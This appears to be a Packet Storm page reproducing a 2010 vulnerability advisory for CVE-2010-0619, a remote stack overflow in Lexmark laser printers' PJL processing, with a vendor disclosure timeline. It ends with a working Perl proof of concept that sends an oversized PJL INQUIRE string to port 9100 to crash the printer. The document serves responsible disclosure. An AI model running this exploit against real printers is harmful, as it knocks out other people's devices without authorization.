what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Lexmark Laser Printer Stack Overflow

Lexmark Laser Printer Stack Overflow
Posted Mar 23, 2010
Authored by Francis Provencher

Multiple Lexmark laser printers suffer from a remote stack overflow vulnerability. Proof of concept code included.

tags | exploit, remote, overflow, proof of concept
advisories | CVE-2010-0619
SHA-256 | 9564488c97337d98ee78100dfc8337f082171206d5b27fc78d0fca2bd0e3c6a7

Lexmark Laser Printer Stack Overflow

Change Mirror Download
#####################################################################################

Application: Lexmark Multiple Laser Printer Remote Stack Overflow

Platforms: Lexmark Multiple Laser printer

Exploitation: Remote Exploitable

CVE Number: CVE-2010-0619

Discover Date: 2010-01-06

Author: Francis Provencher (Protek Research Lab's)

Website: http://www.protekresearchlab.com

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code

#####################################################################################

=================
1) Introduction
=================

Lexmark specializes in printers and printer accessories. Its current
range of products includes color and monochrome laser printers and
inkjet printers, both of which may include scanners (including
all-in-one devices with faxing and copying capabilities and photo
printers), and dot matrix printers. Lexmark was one of the first
companies to release wifi inkjet printers and the very first to
release printers with a web-enabled touchscreen, coming in early
September of 2009. They also offer a wide variety of laser printers
with software solutions for more professional printing environments.

(Wikipedia)

#####################################################################################

====================
2) Report Timeline
====================

2010-01-06 Vendor Contacted
2010-01-09 Vendor Response
2010-01-09 Vendor request a PoC
2010-01-10 PoC is sent to the vendor
2010-01-12 Vendor confirme they received PoC
2010-01-13 Vendor confirm the vulnerability
2010-03-22 Public release of this advisory

#####################################################################################

======================
3) Technical details
======================

Multiple Lexmark Laser Printers contain remote stack overflow
vulnerabilities in their PJL processing functionality. These
vulnerabilities could lead to remote code execution on the printer
without authentication. Device freezes when a specialy PLJ request is
sent to the daemon with an invalid argument on PJL INQUIRE command.

#####################################################################################

=====================
4) Product affected
=====================

The list is too long, you can found information on the Lexmark web site;

http://support.lexmark.com/alerts


#####################################################################################

=============
5) The Code
=============


#!/usr/bin/perl -w
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Lexmark Multiple Laser Printer Remote Stack Overflow PoC
#
# This PoC will completly DoS the printer and all is services, Use it
at your own risk.
#

use IO::Socket;
if (@ARGV < 1){
exit
}
$ip = $ARGV[0];
#open the socket
my $sock = new IO::Socket::INET (
PeerAddr => $ip,
PeerPort => '9100',
Proto => 'tcp',
);


$sock or die "no socket :$!";
send($sock, "\033%-12345X\@PJL INQUIRE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n",0);



close $sock;




#####################################################################################
(PRL-2010-01)
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close